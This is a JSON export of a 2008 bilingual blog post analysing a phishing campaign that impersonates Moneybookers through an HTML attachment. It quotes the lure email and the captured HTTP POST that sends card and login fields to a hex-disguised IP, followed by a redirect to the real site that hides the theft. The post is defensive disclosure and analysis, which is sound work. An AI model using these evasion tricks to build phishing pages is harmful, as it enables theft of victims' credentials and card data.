{"id":850,"date":"2008-04-02T07:01:57","date_gmt":"2008-04-02T05:01:57","guid":{"rendered":"http:\/\/firefang.net\/blog\/850"},"modified":"2008-04-02T07:03:07","modified_gmt":"2008-04-02T05:03:07","slug":"%d7%98%d7%9b%d7%a0%d7%99%d7%a7%d7%aa-%d7%a4%d7%99%d7%a9%d7%99%d7%a0%d7%92-%d7%97%d7%93%d7%a9%d7%94-new-phishing-technique","status":"publish","type":"post","link":"https:\/\/firefang.net\/blog\/850","title":{"rendered":"\u05d8\u05db\u05e0\u05d9\u05e7\u05ea \u05e4\u05d9\u05e9\u05d9\u05e0\u05d2 \u05d7\u05d3\u05e9\u05d4 &#8211; New phishing technique"},"content":{"rendered":"<p>English translation below.<\/p>\n<p>\u05d3\u05d9\u05d9\u05d2\u05d9 \u05d6\u05d4\u05d5\u05ea \u05d4\u05de\u05e6\u05d9\u05d0\u05d5 \u05e9\u05d9\u05d8\u05d4 \u05d7\u05d3\u05e9\u05d4 \u05e9\u05de\u05e1\u05ea\u05d9\u05e8\u05d4 \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d8\u05d5\u05d1\u05d4 \u05de\u05d0\u05d5\u05d3 \u05de\u05de\u05e9\u05ea\u05de\u05e9 \u05dc\u05d0 \u05d8\u05db\u05e0\u05d5\u05dc\u05d5\u05d2\u05d9 \u05d0\u05ea \u05d4\u05de\u05d4\u05d5\u05ea \u05e9\u05dc \u05de\u05d4 \u05e9\u05e7\u05d5\u05e8\u05d4.<br \/>\n\u05d1\u05e0\u05d9\u05d2\u05d5\u05d3 \u05dc\u05d3\u05e8\u05da \u05d4\u05de\u05e7\u05d5\u05d1\u05dc\u05ea, \u05d1\u05d4 \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05d5\u05e4\u05e0\u05d4 \u05dc\u05d0\u05ea\u05e8 \u05e9\u05dc \u05d4\u05e4\u05d9\u05e9\u05e8\u05d9\u05dd, \u05e9\u05e0\u05e8\u05d0\u05d4 \u05db\u05de\u05d5 \u05d4\u05d0\u05ea\u05e8 \u05d4\u05d0\u05de\u05d9\u05ea\u05d9 (Paypal, Bank of america \u05d5\u05db\u05d3\u05d5\u05de\u05d4) &#8211; \u05d1\u05e9\u05d9\u05d8\u05d4 \u05d4\u05d7\u05d3\u05e9\u05d4 \u05d6\u05d4 \u05de\u05d4 \u05e9\u05e7\u05d5\u05e8\u05d4:<\/p>\n<p>1. \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05e7\u05d1\u05dc \u05d0\u05d9\u05de\u05d9\u05d9\u05dc \u05e9\u05e0\u05e8\u05d0\u05d4 \u05db\u05d0\u05d9\u05dc\u05d5 \u05d4\u05d2\u05d9\u05e2 \u05de\u05de\u05e7\u05d5\u05e8 \u05d0\u05de\u05d9\u05ea\u05d9 (\u05d1\u05de\u05e7\u05e8\u05d4 \u05e9\u05dc\u05d9 \u05de\u05d7\u05d1\u05e8\u05d4 \u05d1\u05e9\u05dd Moneybookers, \u05e9\u05d3\u05d9 \u05d3\u05d5\u05de\u05d4 \u05dcPaypal), \u05d4\u05d0\u05d9\u05de\u05d9\u05d9\u05dc \u05d8\u05d5\u05e2\u05df \u05e9\u05de\u05e1\u05d9\u05d1\u05d5\u05ea \u05d0\u05d1\u05d8\u05d7\u05d4 \u05d4\u05d4\u05d5\u05d3\u05e2\u05d4 \u05d1\u05e7\u05d5\u05d1\u05e5 \u05de\u05e6\u05d5\u05e8\u05e3:<\/p>\n<div dir=\"ltr\">\n<strong>For security reasons we have sent the message as an attachment file.<br \/>\nThis measure has been adopted to prevent personal information theft and data loss.<\/strong><br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>\n\u00a9 Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our  Terms and Conditions.<br \/>\nRegistered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.<br \/>\nNone of the information contained in this website constitutes, nor should be construed as Financial Advice.<br \/>\nInternal complaint handling procedures can be requested by contacting our Customer Service Department.\n<\/div>\n<p>2. \u05d4\u05e7\u05d5\u05d1\u05e5 \u05d4\u05de\u05e6\u05d5\u05e8\u05e3 \u05d4\u05d5\u05d0 \u05e7\u05d5\u05d1\u05e5 HTML \u05e8\u05d2\u05d9\u05dc \u05dc\u05d7\u05dc\u05d5\u05d8\u05d9\u05df, \u05e9\u05dc\u05d0 \u05de\u05db\u05d9\u05dc \u05e9\u05d5\u05dd \u05d3\u05d1\u05e8 \u05e9\u05d9\u05d4\u05d9\u05d4 \u05e7\u05dc \u05dc\u05d6\u05d4\u05d5\u05ea \u05d1\u05e1\u05e8\u05d9\u05e7\u05d4 \u05d0\u05d5\u05d8\u05d5\u05de\u05d8\u05d9\u05ea (\u05d4\u05d9\u05d5\u05e8\u05d9\u05e1\u05d8\u05d9\u05ea), \u05d5\u05e0\u05e8\u05d0\u05d4 \u05db\u05de\u05d5 \u05d3\u05e3 \u05e8\u05e9\u05de\u05d9 \u05e9\u05dc Moneybookers,<br \/>\n\u05e9\u05de\u05d8\u05e8\u05ea\u05d5 \u05dc\u05de\u05e0\u05d5\u05e2 \u05d2\u05e0\u05d9\u05d1\u05ea \u05d6\u05d4\u05d5\u05ea, \u05d5\u05db\u05d9\u05d1\u05d5\u05e1 \u05db\u05e1\u05e4\u05d9\u05dd. \u05de\u05d8\u05e8\u05d5\u05ea \u05e8\u05d0\u05d5\u05d9\u05d5\u05ea \u05dc\u05dc\u05d0 \u05e1\u05e4\u05e7, \u05de\u05d4 \u05e9\u05e2\u05d5\u05d6\u05e8 \u05dc\u05d4\u05d5\u05e8\u05d9\u05d3 \u05d0\u05ea \u05d4\u05d4\u05d2\u05e0\u05d5\u05ea \u05d4\u05e4\u05e1\u05d9\u05db\u05d5\u05dc\u05d5\u05d2\u05d9\u05d5\u05ea \u05e9\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05e9\u05e8\u05d5\u05e6\u05d4 \u05dc\u05e2\u05d6\u05d5\u05e8.<\/p>\n<p><a href='http:\/\/firefang.net\/blog\/wp-content\/uploads\/2008\/04\/phishery.png' title='phishery.png'><img src='http:\/\/firefang.net\/blog\/wp-content\/uploads\/2008\/04\/phishery.thumbnail.png' alt='phishery.png' \/><\/a><\/p>\n<p>\u05d4\u05d3\u05e3 \u05de\u05e7\u05e9\u05e8 \u05dc\u05dc\u05d5\u05d2\u05d5\u05d0\u05d9\u05dd \u05d5\u05e7\u05d1\u05e6\u05d9\u05dd \u05de\u05d4\u05d0\u05ea\u05e8 \u05e9\u05dc Moneybookers, \u05de\u05d4 \u05e9\u05de\u05e2\u05dc\u05d4 \u05d0\u05ea \u05e8\u05de\u05ea \u05d4\u05d0\u05de\u05d9\u05e0\u05d5\u05ea \u05d4\u05d5\u05d9\u05d6\u05d5\u05d0\u05dc\u05d9\u05ea \u05e9\u05dc\u05d5.<\/p>\n<p>3. \u05d1\u05e8\u05d2\u05e2 \u05e9\u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05de\u05dc\u05d0 \u05d0\u05ea \u05d4\u05e4\u05e8\u05d8\u05d9\u05dd \u05d5\u05dc\u05d5\u05d7\u05e5 \u05e2\u05dc submit, \u05d4\u05e0\u05ea\u05d5\u05e0\u05d9\u05dd \u05e0\u05e9\u05dc\u05d7\u05d9\u05dd \u05dc\u05e9\u05e8\u05ea \u05e9\u05dc \u05e9\u05dc \u05d4\u05e0\u05d5\u05db\u05dc\u05d9\u05dd, \u05e9\u05e9\u05d5\u05de\u05e8 \u05d0\u05d5\u05ea\u05dd \u05d5\u05de\u05d7\u05d6\u05d9\u05e8 HTTP 302, \u05e9\u05de\u05e4\u05e0\u05d4 \u05dc\u05e9\u05e8\u05ea \u05e9\u05dc MoneyBookers:<\/p>\n<div dir=\"ltr\">\nPOST \/recordings\/theme\/images\/verification.pl.php HTTP\/1.1<br \/>\n<strong>Host: 0x9f.0xe2.0x3a.0x88<\/strong><br \/>\nUser-Agent: Mozilla\/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko\/20080129 Iceweasel\/2.0.0.12 (Debian-2.0.0.12-1)<br \/>\nAccept: text\/xml,application\/xml,application\/xhtml+xml,text\/html;q=0.9,text\/plain;q=0.8,image\/png,*\/*;q=0.5<br \/>\nAccept-Language: en-us,en;q=0.5<br \/>\nAccept-Encoding: gzip,deflate<br \/>\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br \/>\nKeep-Alive: 300<br \/>\nConnection: keep-alive<br \/>\nCookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 72<\/p>\n<p>day=02&#038;month=Jan&#038;year=1912&#038;cvv=44324&#038;txtEmail=44&#038;txtPassword=&#038;txtTuring=<\/p>\n<p><strong>HTTP\/1.1 302 Found<\/strong><br \/>\nDate: Wed, 02 Apr 2008 04:13:22 GMT<br \/>\nServer: Apache\/2.0.52 (CentOS)<br \/>\nX-Powered-By: PHP\/4.3.11<br \/>\n<strong>Location: https:\/\/www.moneybookers.com\/app\/help.pl?s=laundering<\/strong><br \/>\nContent-Length: 0<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8\n<\/div>\n<p>\u05d9\u05e9 \u05db\u05de\u05d4 \u05d3\u05d1\u05e8\u05d9\u05dd \u05e9\u05db\u05d3\u05d0\u05d9 \u05dc\u05e9\u05d9\u05dd \u05d0\u05dc\u05d9\u05d4\u05dd \u05dc\u05d1 (\u05de\u05d5\u05d3\u05d2\u05e9\u05d9\u05dd).<br \/>\n* \u05d4\u05db\u05ea\u05d5\u05d1\u05ea \u05e9\u05dc \u05e9\u05e8\u05ea \u05d4\u05d9\u05e2\u05d3 \u05d4\u05d9\u05d0 0x9f.0xe2.0x3a.0x88. \u05d4\u05d3\u05d1\u05e8 \u05d4\u05de\u05d5\u05d6\u05e8 \u05d4\u05d6\u05d4 \u05d4\u05d5\u05d0 \u05db\u05ea\u05d5\u05d1\u05ea IP \u05d1\u05de\u05e1\u05d5\u05d5\u05d4, \u05de\u05d4 \u05e9\u05de\u05e7\u05e9\u05d4 \u05e2\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d6\u05d4\u05d5\u05ea \u05de\u05d4 \u05e7\u05d5\u05e8\u05d4 \u05e4\u05d4.<br \/>\n* \u05d4\u05ea\u05e9\u05d5\u05d1\u05d4 \u05d4\u05d9\u05d0 HTTP 302, \u05e9\u05de\u05e4\u05e0\u05d4 \u05dc\u05e9\u05e8\u05ea \u05d4\u05de\u05d0\u05d5\u05d1\u05d8\u05d7 \u05e9\u05dc MoneyBookers, \u05de\u05d4 \u05e9\u05d2\u05d5\u05e8\u05dd \u05dc\u05de\u05e9\u05ea\u05de\u05e9 \u05dc\u05d7\u05e9\u05d5\u05d1 \u05e9\u05dc\u05e9\u05dd \u05d4\u05d5\u05d0 \u05d4\u05d2\u05d9\u05e2 \u05db\u05e9\u05d4\u05d5\u05d0 \u05dc\u05d7\u05e5 \u05e2\u05dc Submit.<\/p>\n<p>\u05d6\u05d3\u05d5\u05e0\u05d9.<br \/>\n\u05d4\u05d1\u05e2\u05d9\u05d4 \u05e4\u05d4 \u05d4\u05d9\u05d0 \u05e9\u05d0\u05d9 \u05d0\u05e4\u05e9\u05e8 \u05dc\u05de\u05e0\u05d5\u05e2 \u05de\u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d1\u05e5 HTML \u05de\u05e7\u05d5\u05de\u05d9, \u05d5\u05de\u05db\u05d9\u05d5\u05d5\u05df \u05e9\u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d0 \u05d9\u05d3\u05e2\u05d5 \u05e9\u05e2\u05d1\u05d3\u05d5 \u05e2\u05dc\u05d9\u05d4\u05dd \u05dc\u05d0 \u05d9\u05d4\u05d9\u05d5 \u05d4\u05e8\u05d1\u05d4 \u05d3\u05d9\u05d5\u05d5\u05d7\u05d9\u05dd \u05e2\u05dc \u05d4\u05e2\u05e0\u05d9\u05d9\u05df, \u05d5\u05d2\u05dd \u05d0\u05dd \u05d9\u05d4\u05d9\u05d5 \u05e8\u05d5\u05d1\u05dd \u05dc\u05d0 \u05d9\u05e9\u05db\u05d9\u05dc\u05d5 \u05dc\u05d4\u05d1\u05d9\u05df \u05e2\u05dc \u05de\u05d9 \u05dc\u05d4\u05ea\u05dc\u05d5\u05e0\u05df. \u05d5\u05dc\u05db\u05df \u05db\u05dc\u05d9\u05dd \u05d0\u05d5\u05d8\u05d5\u05de\u05d8\u05d9\u05dd \u05db\u05de\u05d5 \u05d6\u05d9\u05d4\u05d5\u05d9 \u05d6\u05d9\u05d5\u05e3 \u05e8\u05e9\u05ea \u05e9\u05dc \u05d3\u05e4\u05d3\u05e4\u05e0\u05d9\u05dd &#8211; \u05e9\u05de\u05ea\u05d1\u05e1\u05e1 \u05e2\u05dc \u05e9\u05e8\u05ea \u05de\u05e8\u05db\u05d6\u05d9 \u05e9\u05d0\u05d5\u05e1\u05e3 \u05ea\u05dc\u05d5\u05e0\u05d5\u05ea \u05de\u05d4\u05e8\u05d1\u05d4 \u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd &#8211; \u05dc\u05d0 \u05d9\u05e2\u05d1\u05d3\u05d5 \u05db\u05de\u05d5 \u05e9\u05e6\u05e8\u05d9\u05da \u05db\u05d9 \u05dc\u05d0 \u05d9\u05d4\u05d9\u05d5 \u05d4\u05e8\u05d1\u05d4 \u05ea\u05dc\u05d5\u05e0\u05d5\u05ea.<\/p>\n<div dir=\"ltr\">\n========== ENGLISH TRANSLATION ==========<\/p>\n<p>Phishers have come up with a new method to conceal well from non-technical users the essence of what's happening.<br \/>\nUnlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) &#8211; this is what really happens with this approach:<br \/>\n1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:<\/p>\n<p><strong>For security reasons we have sent the message as an attachment file.<br \/>\nThis measure has been adopted to prevent personal information theft and data loss.<\/strong><br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>\n\u00a9 Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our  Terms and Conditions.<br \/>\nRegistered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.<br \/>\nNone of the information contained in this website constitutes, nor should be construed as Financial Advice.<br \/>\nInternal complaint handling procedures can be requested by contacting our Customer Service Department. <\/p>\n<p>2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt &#8211; that help lower the user mental defenses that wants to help.<\/p>\n<p><a href='http:\/\/firefang.net\/blog\/wp-content\/uploads\/2008\/04\/phishery.png' title='phishery.png'><img src='http:\/\/firefang.net\/blog\/wp-content\/uploads\/2008\/04\/phishery.thumbnail.png' alt='phishery.png' \/><\/a><\/p>\n<p>The page links to logos and files from MoneyBookers, a thing which increase it's visual reliability level.<\/p>\n<p>3. When the user fills up the details and hit submit, the data is posted to the crooks site, which stores them and return HTTP 302, which redirect the user to the MoneyBookers site.<\/p>\n<p>POST \/recordings\/theme\/images\/verification.pl.php HTTP\/1.1<br \/>\n<strong>Host: 0x9f.0xe2.0x3a.0x88<\/strong><br \/>\nUser-Agent: Mozilla\/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko\/20080129 Iceweasel\/2.0.0.12 (Debian-2.0.0.12-1)<br \/>\nAccept: text\/xml,application\/xml,application\/xhtml+xml,text\/html;q=0.9,text\/plain;q=0.8,image\/png,*\/*;q=0.5<br \/>\nAccept-Language: en-us,en;q=0.5<br \/>\nAccept-Encoding: gzip,deflate<br \/>\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br \/>\nKeep-Alive: 300<br \/>\nConnection: keep-alive<br \/>\nCookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 72<\/p>\n<p>day=02&#038;month=Jan&#038;year=1912&#038;cvv=44324&#038;txtEmail=44&#038;txtPassword=&#038;txtTuring=<\/p>\n<p><strong>HTTP\/1.1 302 Found<\/strong><br \/>\nDate: Wed, 02 Apr 2008 04:13:22 GMT<br \/>\nServer: Apache\/2.0.52 (CentOS)<br \/>\nX-Powered-By: PHP\/4.3.11<br \/>\n<strong>Location: https:\/\/www.moneybookers.com\/app\/help.pl?s=laundering<\/strong><br \/>\nContent-Length: 0<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8<\/p>\n<p>A few things to pay attention to (in bold):<br \/>\n* The destination post address is 0x9f.0xe2.0x3a.0x88, which is an IP address in disguise.<br \/>\n* The user is redirected to the real secure MoneyBookers site, which makes him think this is where he have sent his data.<\/p>\n<p>Nasty.<br \/>\nThe problem is that you can't prevent the user from running local HTML file, and since the users will not know they have been fooled there will not be many reports about this. that's why automatic tools like browser web forgery detection &#8211; that are based on a central server that collects complaints from many users &#8211; will not work well because there will not be many complaints.\n<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>English translation below. \u05d3\u05d9\u05d9\u05d2\u05d9 \u05d6\u05d4\u05d5\u05ea \u05d4\u05de\u05e6\u05d9\u05d0\u05d5 \u05e9\u05d9\u05d8\u05d4 \u05d7\u05d3\u05e9\u05d4 \u05e9\u05de\u05e1\u05ea\u05d9\u05e8\u05d4 \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d8\u05d5\u05d1\u05d4 \u05de\u05d0\u05d5\u05d3 \u05de\u05de\u05e9\u05ea\u05de\u05e9 \u05dc\u05d0 \u05d8\u05db\u05e0\u05d5\u05dc\u05d5\u05d2\u05d9 \u05d0\u05ea \u05d4\u05de\u05d4\u05d5\u05ea \u05e9\u05dc \u05de\u05d4 \u05e9\u05e7\u05d5\u05e8\u05d4. \u05d1\u05e0\u05d9\u05d2\u05d5\u05d3 \u05dc\u05d3\u05e8\u05da \u05d4\u05de\u05e7\u05d5\u05d1\u05dc\u05ea, \u05d1\u05d4 \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05d5\u05e4\u05e0\u05d4 \u05dc\u05d0\u05ea\u05e8 \u05e9\u05dc \u05d4\u05e4\u05d9\u05e9\u05e8\u05d9\u05dd, \u05e9\u05e0\u05e8\u05d0\u05d4 \u05db\u05de\u05d5 \u05d4\u05d0\u05ea\u05e8 \u05d4\u05d0\u05de\u05d9\u05ea\u05d9 (Paypal, Bank of america \u05d5\u05db\u05d3\u05d5\u05de\u05d4) &#8211; \u05d1\u05e9\u05d9\u05d8\u05d4 \u05d4\u05d7\u05d3\u05e9\u05d4 \u05d6\u05d4 \u05de\u05d4 \u05e9\u05e7\u05d5\u05e8\u05d4: 1. \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05e7\u05d1\u05dc \u05d0\u05d9\u05de\u05d9\u05d9\u05dc \u05e9\u05e0\u05e8\u05d0\u05d4 \u05db\u05d0\u05d9\u05dc\u05d5 \u05d4\u05d2\u05d9\u05e2 \u05de\u05de\u05e7\u05d5\u05e8 \u05d0\u05de\u05d9\u05ea\u05d9 (\u05d1\u05de\u05e7\u05e8\u05d4 \u05e9\u05dc\u05d9 &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/firefang.net\/blog\/850\" class=\"more-link\">\u05dc\u05d4\u05de\u05e9\u05d9\u05da \u05dc\u05e7\u05e8\u05d5\u05d0<span class=\"screen-reader-text\"> \u05d8\u05db\u05e0\u05d9\u05e7\u05ea \u05e4\u05d9\u05e9\u05d9\u05e0\u05d2 \u05d7\u05d3\u05e9\u05d4 &#8211; New phishing technique<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[],"class_list":["post-850","post","type-post","status-publish","format-standard","hentry","category-spam"],"_links":{"self":[{"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/posts\/850","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/comments?post=850"}],"version-history":[{"count":0,"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/posts\/850\/revisions"}],"wp:attachment":[{"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/media?parent=850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/categories?post=850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/firefang.net\/blog\/wp-json\/wp\/v2\/tags?post=850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}